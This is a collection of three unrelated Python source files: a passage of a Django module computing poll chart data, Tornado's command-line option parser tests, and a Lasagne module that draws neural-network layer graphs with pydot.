pollruns = pollruns.order_by('conducted_on')
answers = Answer.objects.\
filter(response__in=responses, question=question).\
select_related('question__poll__org', 'response__contact')
# Save a bit of time with .exists();
# queryset is re-evaluated later as a values set.
if answers.exists():
if question.question_type == Question.TYPE_NUMERIC:
chart_type = 'numeric'
if split_regions:
chart_data, summary_table = multiple_pollruns_numeric_split(
pollruns, answers, responses, question, contact_filters)
else:
chart_data, summary_table = multiple_pollruns_numeric(
pollruns, answers, responses, question, contact_filters)
elif question.question_type == Question.TYPE_OPEN:
chart_type = 'open-ended'
chart_data = word_cloud_data(answers)
elif question.question_type == Question.TYPE_MULTIPLE_CHOICE:
chart_type = 'multiple-choice'
chart_data, summary_table = multiple_pollruns_multiple_choice(
pollruns, answers, responses, contact_filters)
return chart_type, chart_data, summary_table
def word_cloud_data(answers):
"""Chart data for multiple pollruns of a poll."""
return [{'text': word, 'weight': count} for word, count in answers.word_counts()]
def multiple_pollruns_multiple_choice(pollruns, answers, responses, contact_filters):
series = []
for category, pollrun_counts in answers.category_counts_by_pollrun():
series.append(format_series(
pollruns, pollrun_counts, 'id@polls.pollrun_read', params=contact_filters,
name=category))
chart_data = {
'dates': format_x_axis(pollruns),
'series': series,
}
(answer_sums,
answer_avgs,
answer_stdevs,
response_rates) = utils.summarize_by_pollrun(answers, responses)
summary_table = [
('Mean', utils.overall_mean(pollruns, answer_avgs)),
('Standard deviation', utils.overall_stdev(pollruns, answer_avgs)),
('Response rate average (%)', utils.overall_mean(pollruns, response_rates)),
]
return chart_data, summary_table
def multiple_pollruns_numeric(pollruns, answers, responses, question, contact_filters):
(answer_sums,
answer_avgs,
answer_stdevs,
response_rates) = utils.summarize_by_pollrun(answers, responses)
sum_data = []
avg_data = []
rate_data = []
pollrun_urls = []
participation_urls = []
for pollrun in pollruns:
sum_data.append(answer_sums.get(pollrun.pk, 0))
avg_data.append(answer_avgs.get(pollrun.pk, 0))
rate_data.append(response_rates.get(pollrun.pk, 0))
pollrun_urls.append(
_url('polls.pollrun_read', [pollrun.pk], params=contact_filters))
participation_urls.append(
_url('polls.pollrun_participation', [pollrun.pk], params=contact_filters))
chart_data = {
'dates': format_x_axis(pollruns),
'sum': [{'name': question.name, 'data': sum_data}],
'average': [{'name': question.name, 'data': avg_data}],
'response-rate': [{'name': question.name, 'data': rate_data}],
'pollrun-urls': pollrun_urls,
'participation-urls': participation_urls,
}
summary_table = [
('Mean', utils.overall_mean(pollruns, answer_avgs)),
('Standard deviation', utils.overall_stdev(pollruns, answer_avgs)),
('Response rate average (%)', utils.overall_mean(pollruns, response_rates)),
]
return chart_data, summary_table
def multiple_pollruns_numeric_split(pollruns, answers, responses, question, contact_filters):
"""Return separate series for each contact region."""
data = utils.summarize_by_region_and_pollrun(answers, responses)
sum_data = []
avg_data = []
rate_data = []
regions = (Region.objects.filter(pk__in=data.keys()).order_by(Lower('name')))
for region in regions:
answer_sums, answer_avgs, answer_stdevs, response_rates = data.get(region.pk)
region_answer_sums = []
region_answer_avgs = []
region_response_rates = []
for pollrun in pollruns:
region_answer_sums.append(answer_sums.get(pollrun.pk, 0))
region_answer_avgs.append(answer_avgs.get(pollrun.pk, 0))
region_response_rates.append(response_rates.get(pollrun.pk, 0))
sum_data.append({'name': region.name, 'data': region_answer_sums})
avg_data.append({'name': region.name, 'data': region_answer_avgs})
rate_data.append({'name': region.name, 'data': region_response_rates})
pollrun_urls = [
_url('polls.pollrun_read', [p.pk], params=contact_filters)
for p in pollruns]
participation_urls = [
_url('polls.pollrun_participation', [p.pk], params=contact_filters)
for p in pollruns]
chart_data = {
'dates': format_x_axis(pollruns),
'sum': sum_data,
'average': avg_data,
'response-rate': rate_data,
'pollrun-urls': pollrun_urls,
'participation-urls': participation_urls,
}
(pollrun_answer_sums,
pollrun_answer_avgs,
pollrun_answer_stdevs,
pollrun_response_rates) = utils.summarize_by_pollrun(answers, responses)
summary_table = [
('Mean', utils.overall_mean(pollruns, pollrun_answer_avgs)),
('Standard deviation', utils.overall_stdev(pollruns, pollrun_answer_avgs)),
('Response rate average (%)', utils.overall_mean(pollruns, pollrun_response_rates)),
]
return chart_data, summary_table
| |
from __future__ import absolute_import, division, print_function, with_statement
import datetime
import os
import sys
from tornado.options import OptionParser, Error
from tornado.util import basestring_type
from tornado.test.util import unittest
try:
from cStringIO import StringIO # python 2
except ImportError:
from io import StringIO # python 3
try:
from unittest import mock # python 3.3
except ImportError:
try:
import mock # third-party mock package
except ImportError:
mock = None
class OptionsTest(unittest.TestCase):
def test_parse_command_line(self):
options = OptionParser()
options.define("port", default=80)
options.parse_command_line(["main.py", "--port=443"])
self.assertEqual(options.port, 443)
def test_parse_config_file(self):
options = OptionParser()
options.define("port", default=80)
options.parse_config_file(os.path.join(os.path.dirname(__file__),
"options_test.cfg"))
self.assertEquals(options.port, 443)
def test_parse_callbacks(self):
options = OptionParser()
self.called = False
def callback():
self.called = True
options.add_parse_callback(callback)
# non-final parse doesn't run callbacks
options.parse_command_line(["main.py"], final=False)
self.assertFalse(self.called)
# final parse does
options.parse_command_line(["main.py"])
self.assertTrue(self.called)
# callbacks can be run more than once on the same options
# object if there are multiple final parses
self.called = False
options.parse_command_line(["main.py"])
self.assertTrue(self.called)
def test_help(self):
options = OptionParser()
try:
orig_stderr = sys.stderr
sys.stderr = StringIO()
with self.assertRaises(SystemExit):
options.parse_command_line(["main.py", "--help"])
usage = sys.stderr.getvalue()
finally:
sys.stderr = orig_stderr
self.assertIn("Usage:", usage)
def test_subcommand(self):
base_options = OptionParser()
base_options.define("verbose", default=False)
sub_options = OptionParser()
sub_options.define("foo", type=str)
rest = base_options.parse_command_line(
["main.py", "--verbose", "subcommand", "--foo=bar"])
self.assertEqual(rest, ["subcommand", "--foo=bar"])
self.assertTrue(base_options.verbose)
rest2 = sub_options.parse_command_line(rest)
self.assertEqual(rest2, [])
self.assertEqual(sub_options.foo, "bar")
# the two option sets are distinct
try:
orig_stderr = sys.stderr
sys.stderr = StringIO()
with self.assertRaises(Error):
sub_options.parse_command_line(["subcommand", "--verbose"])
finally:
sys.stderr = orig_stderr
def test_setattr(self):
options = OptionParser()
options.define('foo', default=1, type=int)
options.foo = 2
self.assertEqual(options.foo, 2)
def test_setattr_type_check(self):
# setattr requires that options be the right type and doesn't
# parse from string formats.
options = OptionParser()
options.define('foo', default=1, type=int)
with self.assertRaises(Error):
options.foo = '2'
def test_setattr_with_callback(self):
values = []
options = OptionParser()
options.define('foo', default=1, type=int, callback=values.append)
options.foo = 2
self.assertEqual(values, [2])
def _sample_options(self):
options = OptionParser()
options.define('a', default=1)
options.define('b', default=2)
return options
def test_iter(self):
options = self._sample_options()
# OptionParsers always define 'help'.
self.assertEqual(set(['a', 'b', 'help']), set(iter(options)))
def test_getitem(self):
options = self._sample_options()
self.assertEqual(1, options['a'])
def test_items(self):
options = self._sample_options()
# OptionParsers always define 'help'.
expected = [('a', 1), ('b', 2), ('help', options.help)]
actual = sorted(options.items())
self.assertEqual(expected, actual)
def test_as_dict(self):
options = self._sample_options()
expected = {'a': 1, 'b': 2, 'help': options.help}
self.assertEqual(expected, options.as_dict())
def test_group_dict(self):
options = OptionParser()
options.define('a', default=1)
options.define('b', group='b_group', default=2)
frame = sys._getframe(0)
this_file = frame.f_code.co_filename
self.assertEqual(set(['b_group', '', this_file]), options.groups())
b_group_dict = options.group_dict('b_group')
self.assertEqual({'b': 2}, b_group_dict)
self.assertEqual({}, options.group_dict('nonexistent'))
@unittest.skipIf(mock is None, 'mock package not present')
def test_mock_patch(self):
# ensure that our setattr hooks don't interfere with mock.patch
options = OptionParser()
options.define('foo', default=1)
options.parse_command_line(['main.py', '--foo=2'])
self.assertEqual(options.foo, 2)
with mock.patch.object(options.mockable(), 'foo', 3):
self.assertEqual(options.foo, 3)
self.assertEqual(options.foo, 2)
# Try nested patches mixed with explicit sets
with mock.patch.object(options.mockable(), 'foo', 4):
self.assertEqual(options.foo, 4)
options.foo = 5
self.assertEqual(options.foo, 5)
with mock.patch.object(options.mockable(), 'foo', 6):
self.assertEqual(options.foo, 6)
self.assertEqual(options.foo, 5)
self.assertEqual(options.foo, 2)
def test_types(self):
options = OptionParser()
options.define('str', type=str)
options.define('basestring', type=basestring_type)
options.define('int', type=int)
options.define('float', type=float)
options.define('datetime', type=datetime.datetime)
options.define('timedelta', type=datetime.timedelta)
options.parse_command_line(['main.py',
'--str=asdf',
'--basestring=qwer',
'--int=42',
'--float=1.5',
'--datetime=2013-04-28 05:16',
'--timedelta=45s'])
self.assertEqual(options.str, 'asdf')
self.assertEqual(options.basestring, 'qwer')
self.assertEqual(options.int, 42)
self.assertEqual(options.float, 1.5)
self.assertEqual(options.datetime,
datetime.datetime(2013, 4, 28, 5, 16))
self.assertEqual(options.timedelta, datetime.timedelta(seconds=45))
def test_multiple_string(self):
options = OptionParser()
options.define('foo', type=str, multiple=True)
options.parse_command_line(['main.py', '--foo=a,b,c'])
self.assertEqual(options.foo, ['a', 'b', 'c'])
def test_multiple_int(self):
options = OptionParser()
options.define('foo', type=int, multiple=True)
options.parse_command_line(['main.py', '--foo=1,3,5:7'])
self.assertEqual(options.foo, [1, 3, 5, 6, 7])
def test_error_redefine(self):
options = OptionParser()
options.define('foo')
with self.assertRaises(Error) as cm:
options.define('foo')
self.assertRegexpMatches(str(cm.exception),
'Option.*foo.*already defined')
| |
"""Visualize a neural network as a (dot) graph.
This module provides functions and classes to generate dot graphs for a
given lasagne model or a list of layers. It provides e.g. the ability to
"draw" a model "to_notebook", pretty much exactly like `nolearn
<https://github.com/dnouri/nolearn>`_ via:
>>> from utils.visualize import draw_to_notebook, nolearn
>>> model = ...
>>> draw_to_notebook(model, nolearn)
The module allows more customization for the drawing of notebooks.
The functions ``draw_to_file`` and ``draw_to_notebook`` take the keyword
argument ``node_creator``
The module provides the following creation functions:
``nolearn`` draws as nolearn's implementation would and takes the
same arguments.
``verbose_create`` creates a graph with a lot of information.
``format_create`` allows type specific node creation by using string
formatting. The color of the node and a format string that is
used to create the label are passed on as two dictionaries.
``default_create`` is the default creator and executes
``format_create`` with either a short format map or
a more verbose one
The module also provides ways to create and pass type specific color maps
for the layers (with static colors). The function ``colors_from_cmap``
creates such a dictionary for the colors from a (matplotlib) colormap.
The ``ParamFormatter`` that is used by default also provides some
useful format specifiers for a :class:`Layer`'s attributes.
"""
from string import Formatter
from lasagne.layers import Layer, conv, get_all_layers, pool, recurrent
from lasagne.layers.conv import Conv1DLayer, Conv2DLayer, Conv3DLayer,\
Deconv2DLayer, DilatedConv2DLayer, TransposedConv2DLayer,\
TransposedConv3DLayer
from lasagne.layers.dense import DenseLayer, NINLayer
from lasagne.layers.embedding import EmbeddingLayer
from lasagne.layers.input import InputLayer
from lasagne.layers.local import LocallyConnected2DLayer
from lasagne.layers.merge import ConcatLayer, ElemwiseMergeLayer,\
ElemwiseSumLayer
from lasagne.layers.noise import DropoutLayer, GaussianNoiseLayer
from lasagne.layers.normalization import BatchNormLayer,\
LocalResponseNormalization2DLayer
from lasagne.layers.pool import FeaturePoolLayer, FeatureWTALayer,\
GlobalPoolLayer, MaxPool1DLayer, MaxPool2DLayer, MaxPool3DLayer,\
Pool1DLayer, Pool2DLayer, Pool3DLayer, SpatialPyramidPoolingLayer,\
Upscale1DLayer, Upscale2DLayer, Upscale3DLayer
from lasagne.layers.recurrent import CustomRecurrentLayer, GRULayer, Gate,\
LSTMLayer, RecurrentLayer
from lasagne.layers.shape import DimshuffleLayer, FlattenLayer, PadLayer,\
ReshapeLayer, SliceLayer
from lasagne.layers.special import BiasLayer, ExpressionLayer, InverseLayer,\
NonlinearityLayer, ParametricRectifierLayer, RandomizedRectifierLayer,\
ScaleLayer, TPSTransformerLayer, TransformerLayer
from matplotlib.cm import get_cmap
from matplotlib.colors import rgb2hex
from pydotplus import Dot, Edge, Node
__all__ = ('draw_to_file', 'draw_to_notebook', 'pydot_graph', 'nolearn',
'SHORT', 'VERBOSE', 'default_create', 'format_create',
'ParamFormatter', 'verbose_create', 'DEFAULT_MAP',
'colors_from_cmap', 'dot_escape')
# draw like nolearn does it
NOLEARN_COLORS = ('#4A88B3', '#98C1DE', '#6CA2C8', '#3173A2', '#17649B',
'#FFBB60', '#FFDAA9', '#FFC981', '#FCAC41', '#F29416',
'#C54AAA', '#E698D4', '#D56CBE', '#B72F99', '#B0108D',
'#75DF54', '#B3F1A0', '#91E875', '#5DD637', '#3FCD12')
def _nolearn_color(layer):
"""Return a color for the given layer, like nolearn would."""
cls_name = type(layer).__name__
hashed = hash(cls_name) % 5
if cls_name in conv.__all__:
return NOLEARN_COLORS[:5][hashed]
elif cls_name in pool.__all__:
return NOLEARN_COLORS[5:10][hashed]
elif cls_name in recurrent.__all__:
return NOLEARN_COLORS[10:15][hashed]
return NOLEARN_COLORS[15:20][hashed]
def nolearn(layer, output_shape=True, verbose=False, **kwargs):
"""Create a :class:`Node` for a given layer, like nolearn would.
Parameters
----------
layer : a class:`Layer` instance
The layer for which a node shall be created.
output_shape : boolean (``True``)
If ``True`` the output shape of the layer will be displayed.
verbose : boolean (''False`)
If ``True`` layer attributes like filter shape, stride, etc.
will be displayed.
kwargs : keyword arguments
Those will be passed down to :class:`Node`.
"""
label = type(layer).__name__
color = _nolearn_color(layer)
if verbose:
for attr in ['num_filters', 'num_units', 'ds', 'filter_shape',
'stride', 'strides', 'p']:
if hasattr(layer, attr):
label += f'\n{attr}: {getattr(layer, attr)}'
if hasattr(layer, 'nonlinearity'):
try:
nonlinearity = layer.nonlinearity.__name__
except AttributeError:
nonlinearity = layer.nonlinearity.__class__.__name__
label += f'\nnonlinearity: {nonlinearity}'
if output_shape:
label += f'\nOutput shape: {layer.output_shape}'
return Node(repr(layer), label=label, shape='record',
fillcolor=color, style='filled', **kwargs)
# get colors from a colormap
def _types_from_lasange():
"""Retrieve a list of all layer types from lasagne."""
from lasagne.layers import input, base, dense, noise, local, shape, \
merge, normalization, special
modules = (input, base, conv, dense, recurrent, pool, shape, merge,
normalization, noise, local, special)
types = []
for mod in modules:
for name in mod.__all__:
obj = getattr(mod, name)
if obj in types:
continue
if isinstance(obj, type) and issubclass(obj, Layer):
types.append(obj)
return types
def colors_from_cmap(types=None, color_map='terrain'):
"""Create a color dict from a color map.
Parameters
----------
layers : list of :class:`Layer` instances or ``None`` (``None``)
The color dict will be created for this list of layers, if
``None`` a list of all layers is retrieved from lasagne.
color_map : string or colormap (``'terrain'``)
The colormap to use.
"""
types = types or _types_from_lasange()
cmap = get_cmap(color_map, 2 + len(types) * 1.1)
return {t: rgb2hex(cmap(i)[:3]) for i, t in enumerate(types)}
DEFAULT_MAP = colors_from_cmap()
def dot_escape(obj):
"""Create a string a escape all illegal characters."""
def replace_all(string, old):
result = string
for char in old:
result = result.replace(char, '\\' + char)
return result
return replace_all(str(obj), '<>(){}-[]')
def verbose_create(layer, color_map=DEFAULT_MAP,
blacklist=('input_layer', 'input_layers'), **kwargs):
"""Create a node for the layer with a lot of information.
Parameters
----------
layer : a :class:`Layer` instance
The layer.
color_map ; dictionary
A dictionary that maps all layer types to a color value.
blacklist : sequence of strings
A list of attribute names that are not included.
kwargs : keyword arguments
Those will be passed down to :class:`Node`.
"""
label = type(layer).__name__
color = color_map[type(layer)]
variables = vars(layer)
label += '\n' + '\n'.join((f'{n} : {dot_escape(variables[n])}'
for n in sorted(variables)
if n not in blacklist))
return Node(repr(layer), label=label, shape='record',
fillcolor=color, style='filled', **kwargs)
# create nodes via a class specific string format system
EMPTY = {
# input
InputLayer: '',
# dense
DenseLayer: '',
NINLayer: '',
# convolution
Conv1DLayer: '',
Conv2DLayer: '',
Conv3DLayer: '',
TransposedConv2DLayer: '',
TransposedConv3DLayer: '',
Deconv2DLayer: '',
DilatedConv2DLayer: '',
# local
LocallyConnected2DLayer: '',
# pooling
Pool1DLayer: '',
Pool2DLayer: '',
Pool3DLayer: '',
MaxPool1DLayer: '',
MaxPool2DLayer: '',
MaxPool3DLayer: '',
Upscale1DLayer: '',
Upscale2DLayer: '',
Upscale3DLayer: '',
GlobalPoolLayer: '',
FeaturePoolLayer: '',
FeatureWTALayer: '',
SpatialPyramidPoolingLayer: '',
# recurrent
CustomRecurrentLayer: '',
RecurrentLayer: '',
LSTMLayer: '',
GRULayer: '',
Gate: '',
# noise
DropoutLayer: '',
GaussianNoiseLayer: '',
# shape
ReshapeLayer: '',
FlattenLayer: '',
DimshuffleLayer: '',
PadLayer: '',
SliceLayer: '',
# merge
ConcatLayer: '',
ElemwiseMergeLayer: '',
ElemwiseSumLayer: '',
# normalization
BatchNormLayer: '',
LocalResponseNormalization2DLayer: '',
# embedding
EmbeddingLayer: '',
# special
NonlinearityLayer: '',
BiasLayer: '',
ScaleLayer: '',
ExpressionLayer: '',
InverseLayer: '',
TransformerLayer: '',
TPSTransformerLayer: '',
ParametricRectifierLayer: '',
RandomizedRectifierLayer: '',
}
VERBOSE = {
# input
InputLayer: 'input: {output_shape}',
# dense
DenseLayer: '''fully connected
W: {W:param}
bias: {b:param}
nonlinearity: {nonlinearity:func}
output: {output_shape}''',
NINLayer: '''network in network
units: {num_units}
W: {W:param}
bias: {b:param}
nonlinearity: {nonlinearity:func}
output: {output_shape}
''',
# convolution
Conv1DLayer: '''convolution
filters: {num_filters}
filter size: {filter_size}
convolution: {convolution:func}
weights: {W:param}
bias: {b:param}
stride: {stride:shape}
padding: {pad}
nonlinearity: {nonlinearity:func}
output: {output_shape}''',
Conv2DLayer: '''convolution
filters: {num_filters}
filter size: {filter_size:shape}
convolution: {convolution:func}
weights: {W:param}
bias: {b:param}
stride: {stride:shape}
padding: {pad}
nonlinearity: {nonlinearity:func}
output: {output_shape}''',
Conv3DLayer: '''convolution
filters: {num_filters}
filter size: {filter_size}
convolution: {convolution:func}
weights: {W:param}
bias: {b:param}
stride: {stride:shape}
padding: {pad}
nonlinearity: {nonlinearity:func}
output: {output_shape}''',
TransposedConv2DLayer: '''de-convolution,
filters: {num_filters}
filter size: {filter_size}
weights: {W:param}
bias: {b:param}
stride: {stride:shape}
cropping: {crop}
nonlinearity: {nonlinearity:func}
output: {output_shape}''',
TransposedConv3DLayer: '''de-convolution,
filters: {num_filters}
filter size: {filter_size}
weights: {W:param}
bias: {b:param}
stride: {stride:shape}
cropping: {crop}
nonlinearity: {nonlinearity:func}
output: {output_shape}''',
Deconv2DLayer: '''de-convolution
filters: {num_filters}
filter size: {filter_size}
weights: {W:param}
bias: {b:param}
stride: {stride:shape}
cropping: {crop}
nonlinearity: {nonlinearity:func}
output: {output_shape}''',
DilatedConv2DLayer: '''dilated conv.
filters: {num_filters}
filter size: {filter_size}
dilation: {dilation}
weights: {W:param}
bias: {b:param}
padding: {pad}
nonlinearity: {nonlinearity:func}
output: {output_shape}''',
LocallyConnected2DLayer: '''
filters: {num_filters}
filter size: {filter_size}
weights: {W:param}
bias: {b:param}
stride: {stride:shape}
padding: {pad}
nonlinearity: {nonlinearity:func}
channel wise : {channelwise}
output: {output_shape}''',
# pooling
Pool1DLayer: '''pooling
pool size: {pool_size:shape}
stride: {stride:shape}
pad: {pad:list}
mode: {mode}
output: {output_shape}''',
Pool2DLayer: '''pooling
pool size : {pool_size:shape}
stride: {stride:shape}
pad: {pad:list}
mode: {mode}
output: {output_shape}''',
Pool3DLayer: '''pooling
pool size: {pool_size:shape}
stride: {stride:shape}
pad: {pad:list}
mode: {mode}
output: {output_shape}''',
MaxPool1DLayer: '''max-pooling
pool size: {pool_size:shape}
stride: {stride:shape}
pad: {pad:list}
output: {output_shape}''',
MaxPool2DLayer: '''max-pooling
pool size: {pool_size:shape}
stride: {stride:shape}
pad: {pad:list}
output: {output_shape}''',
MaxPool3DLayer: '''max-pooling
pool size: {pool_size:shape}
stride: {stride:shape}
pad: {pad:list}
output: {output_shape}''',
Upscale1DLayer: '''upscale
scale factor: {scale_factor:list}
output: {output_shape}''',
Upscale2DLayer: '''upscale
scale factor: {scale_factor:list}
output: {output_shape}''',
Upscale3DLayer: '''upscale
scale factor: {scale_factor:list}
output: {output_shape}''',
GlobalPoolLayer: '''global pooling
function: {pool_function:func}
output: {output_shape}''',
FeaturePoolLayer: '''feature pooling
function: {pool_function:func}
pool size: {pool_size:shape}
axis: {axis}
output: {output_shape}''',
FeatureWTALayer: '''WTA feat. pool.
pool size: {pool_size:shape}
axis: {axis}
output: {output_shape}''',
SpatialPyramidPoolingLayer: '''pyramid pooling
pool. dimentions: {pool_dims}
mode: {mode}
implementation: {implementation}
output: {output_shape}''',
# recurrent
CustomRecurrentLayer: '',
RecurrentLayer: '',
LSTMLayer: '',
GRULayer: '',
Gate: '',
# noise
DropoutLayer: '''dropout
dropout prob.: {p:0.3%}
rescale outputs: {rescale}
shared axes: {shared_axes}''',
GaussianNoiseLayer: '''gauss. noise
std. deviation: {sigma}''',
# shape
ReshapeLayer: '''reshape
output: {output_shape}''',
FlattenLayer: '''flatten
output dims.: {outdim}
output: {output_shape}''',
DimshuffleLayer: '''dim-shuffle
pattern: {pattern}
output: {output_shape}''',
PadLayer: '''padding
value: {val}
width: {width:list}
since dim: {batch_ndim}
output: {output_shape}''',
SliceLayer: '''slicing
indices: {indices}
axis: {axis}
output: {output_shape}''',
# merge
ConcatLayer: '''concatenation
axis: {axis}
cropping: {cropping:list}
output: {output_shape}''',
ElemwiseMergeLayer: '''elem-wise merge
function: {merge_function:func}
cropping: {cropping:list}
output: {output_shape}''',
ElemwiseSumLayer: '''elem-wise sum
coefficients: {coeffs:list}
cropping: {cropping:list}
output: {output_shape}''',
# normalization
LocalResponseNormalization2DLayer: '''LRN
alpha: {alpha:value}
k: {k:value}
beta: {beta:value}
n: {n}''',
BatchNormLayer: '''batch normalization
alpha: {alpha:value}
beta: {beta:param}
epsilon: {epsilon:value}
gamma: {gamma:param}
axes: {axes:list}''',
# embedding
EmbeddingLayer: '''embedding
input size: {input_size}
output size: {output_size}
output: {output_shape}''',
# special
NonlinearityLayer: 'nonlinearity: {nonlinearity:func}',
BiasLayer: '''bias
bias: {b:param}
shared axes: {shared_axes:list}''',
ScaleLayer: '''scaling
scales: {scales:param}
shared axes: {shared_axes:list}''',
ExpressionLayer: '''expression
function: {function:func}
output: {output_shape}''',
InverseLayer: '''inverse
layer: {layer}
output: {output_shape}''',
TransformerLayer: '''
network: {localization_network}
downsample factor: {downsample_factor:list}
border mode: {border_mode}
output: {output_shape}''',
TPSTransformerLayer: '''spacial trans.
network: {localization_network}
downsample factor: {downsample_factor:list}
control points: {control_points}
precompute grid: {precompute_grid}
border mode: {border_mode}
output: {output_shape}''',
ParametricRectifierLayer: '''PReLU
alpha: {alpha:value}
shared axes: {shared_axes}''',
RandomizedRectifierLayer: '''RReLU
lower bound: {lower:value}
upper bound: {upper:value}
shared axes: {shared_axes}''',
}
SHORT = {
# input
InputLayer: 'input: {output_shape}',
# dense
DenseLayer: '''fully connected
nonlinearity: {nonlinearity:func}
output: {output_shape}''',
NINLayer: '''NiN
nonlinearity: {nonlinearity:func}
output: {output_shape}''',
# convolution
Conv1DLayer: '''conv. {num_filters}, {filter_size:shape} \\\\{stride:shape}
output: {output_shape}''',
Conv2DLayer: '''conv. {num_filters}, {filter_size:shape} \\\\{stride:shape}
output: {output_shape}''',
Conv3DLayer: '''conv. {num_filters}, {filter_size:shape} \\\\{stride:shape}
output: {output_shape}''',
TransposedConv2DLayer:
'''de-conv. {num_filters}, {filter_size:shape} \\\\{stride:shape}
output: {output_shape}''',
TransposedConv3DLayer:
'''de-conv. {num_filters}, {filter_size:shape} \\\\{stride:shape}
output: {output_shape}''',
Deconv2DLayer:
'''de-conv. {num_filters}, {filter_size:shape} \\\\{stride:shape}
output: {output_shape}''',
DilatedConv2DLayer: '',
# local
LocallyConnected2DLayer: '',
# pooling
Pool1DLayer: '''pool. {pool_size:shape} \\\\{stride:shape}
output: {output_shape}''',
Pool2DLayer: '''pool. {pool_size:shape} \\\\{stride:shape}
output: {output_shape}''',
Pool3DLayer: '''pool. {pool_size:shape} \\\\{stride:shape}
output: {output_shape}''',
MaxPool1DLayer: '''max-pool. {pool_size:shape} \\\\{stride:shape}
output: {output_shape}''',
MaxPool2DLayer: '''max-pool. {pool_size:shape} \\\\{stride:shape}
output: {output_shape}''',
MaxPool3DLayer: '''max-pool. {pool_size:shape} \\\\{stride:shape}
output: {output_shape}''',
Upscale1DLayer: '''upscale {scale_factor:list}
output: {output_shape}''',
Upscale2DLayer: '''upscale {scale_factor:list}
output: {output_shape}''',
Upscale3DLayer: '''upscale {scale_factor:list}
output: {output_shape}''',
GlobalPoolLayer: '''global pooling: {pool_function:func}
output: {output_shape}''',
FeaturePoolLayer: '',
FeatureWTALayer: '',
SpatialPyramidPoolingLayer: '',
# recurrent
CustomRecurrentLayer: '',
RecurrentLayer: '',
LSTMLayer: '',
GRULayer: '',
Gate: '',
# noise
DropoutLayer: 'dropout, {p:0.2%}',
GaussianNoiseLayer: 'noise (sigma:value)',
# shape
ReshapeLayer: 'reshape\noutput: {output_shape}',
FlattenLayer: 'flatten\noutput: {output_shape}',
DimshuffleLayer: 'dim-shuffle ({pattern})\noutput: {output_shape}',
PadLayer: '''padding ({val} \\{width})
output: {output_shape}''',
SliceLayer: '',
# merge
ConcatLayer: 'concatenation\noutput: {output_shape}',
ElemwiseMergeLayer: 'merge, {merge_function:func}',
ElemwiseSumLayer: '+',
# normalization
BatchNormLayer: 'BN',
LocalResponseNormalization2DLayer: '',
# embedding
EmbeddingLayer: '',
# special
NonlinearityLayer: '{nonlinearity:func}',
BiasLayer: 'bias',
ScaleLayer: 'scaling',
ExpressionLayer: 'expression\noutput: {output_shape}',
InverseLayer: '',
TransformerLayer: '',
TPSTransformerLayer: '',
ParametricRectifierLayer: 'PReLU',
RandomizedRectifierLayer: 'RReLU',
}
class ParamFormatter(Formatter):
"""A special :class:`Formatter` for the layer attributes.
The formatter will (somewhat) nicely format the input and output
shapes, they are formatted and also offers special format specs
for formatting the parameters of a layer.
The format specs are:
- ``'shape'``: to format a shape like ``'32x32'``
- ``'func'``: to show the name of a function.
- ``'param'``: will show the shape of the parameter in a list.
- ``'list'``: will show the parameter as a list.
- ``'value'``: to display the value of a parameter.
"""
shapes = ('output_shape', 'input_shape')
@staticmethod
def activation_shape(shape):
"""Format a input and output shape."""
if len(shape) == 2:
return f'{shape[1]} units'
elif len(shape) == 4:
return '{} ch, {} x {}'.format(*shape[1:])
elif len(shape) == 5:
return '{} ch, {} x {} x {}'.format(*shape[1:])
else:
raise ValueError(f'Can not handle shape "{shape}".')
@staticmethod
def param_shape(shape):
"""Format a parameter shape."""
if shape is None:
return 'none'
if len(shape) == 1:
return f'[{shape[0]}, ]'
return '[{}]'.format(', '.join(str(i) for i in shape))
def get_value(self, key, args, kwargs):
if not isinstance(key, str):
return super(ParamFormatter, self).get_value(key, args, kwargs)
if key in self.shapes:
return self.activation_shape(kwargs[key])
return super(ParamFormatter, self).get_value(key, args, kwargs)
def format_field(self, value, format_spec):
if format_spec == 'shape':
return 'x'.join(str(i) for i in value)
elif format_spec == 'func':
try:
return value.__name__
except AttributeError:
return value.__class__.__name__
elif format_spec == 'param':
if value is None:
return 'none'
shape = value.shape.eval()
return self.param_shape(shape)
elif format_spec == 'list':
return self.param_shape(value)
elif format_spec == 'value':
try:
value = value.eval()
except AttributeError:
pass
return str(value)
return super(ParamFormatter, self).format_field(value, format_spec)
def format_create(layer, format_map, color_map=DEFAULT_MAP,
formatter=ParamFormatter(), **kwargs):
"""Create a :class:`Node` from a formatting system.
Parameters
----------
layer : a :class:`Layer` instance
The layer.
format_map : a dictionary mapping layer types to format strings
A dictionary that contains a format string for each of the
layer's types. The information for the node is created by using
``formatter`` to call format with all the layer attributes as
(keyword) arguments.
color_map: a dictionary mapping layer types to strings
The dictionary should contain all the colors for all the used
layer types.
formatter : :class:`Formatter` instance
The formatter for creating the node information.
kwargs : keyword arguments
Those will be passed down to :class:`Node`.
"""
color = color_map[type(layer)]
variables = {n: getattr(layer, n) for n in dir(layer)}
label = formatter.format(format_map[type(layer)], **variables)
return Node(repr(layer), label=label, shape='record',
fillcolor=color, style='filled', **kwargs)
def default_create(layer, verbose=False, **kwargs):
"""Default creation function for nodes.
Parameters
----------
layer : a :class:`Layer` instance
The layer.
verbose : boolean (``False``)
Show extra information if ``True``.
kwargs : keyword arguments
Those will be passed to ``format_create`` and :class:`Node`.
"""
frmt_dct = VERBOSE if verbose else SHORT
return format_create(layer, frmt_dct, **kwargs)
# creating and drawing graphs
def draw_to_file(layer_or_layers, filename, node_creator=default_create,
**kwargs):
"""Draws a network diagram to a file.
Parameters
----------
layer_or_layers : one :class:`Layer` instance or a list of layers
Either a list of layers or the model in form of the last layer.
filename : string
The filename to save the output to.
node_creator : callable
A function that creates a :class:`Node` for a given layer.
kwargs : keyword arguments
Those will be passed to ``pydot_graph``, ``node_creator`` and
later to :class:`Node`.
"""
if isinstance(layer_or_layers, Layer):
layers = get_all_layers(layer_or_layers)
else:
layers = layer_or_layers
dot = pydot_graph(layers, node_creator=node_creator, **kwargs)
ext = filename.rsplit('.', 1)[1]
with open(filename, 'wb') as fid:
fid.write(dot.create(format=ext))
def draw_to_notebook(layer_or_layers, node_creator=default_create, **kwargs):
"""Draws a network diagram in an IPython notebook.
Parameters
----------
layer_or_layers : one :class:`Layer` instance or a list of layers
Either a list of layers or the model in form of the last layer.
node_creator : callable
A function that creates a :class:`Node` for a given layer.
kwargs : keyword arguments
Those will be passed to ``pydot_graph``, ``node_creator`` and
later to :class:`Node`.
"""
from IPython.display import Image
if isinstance(layer_or_layers, Layer):
layers = get_all_layers(layer_or_layers)
else:
layers = layer_or_layers
dot = pydot_graph(layers, node_creator=node_creator, **kwargs)
return Image(dot.create_png())
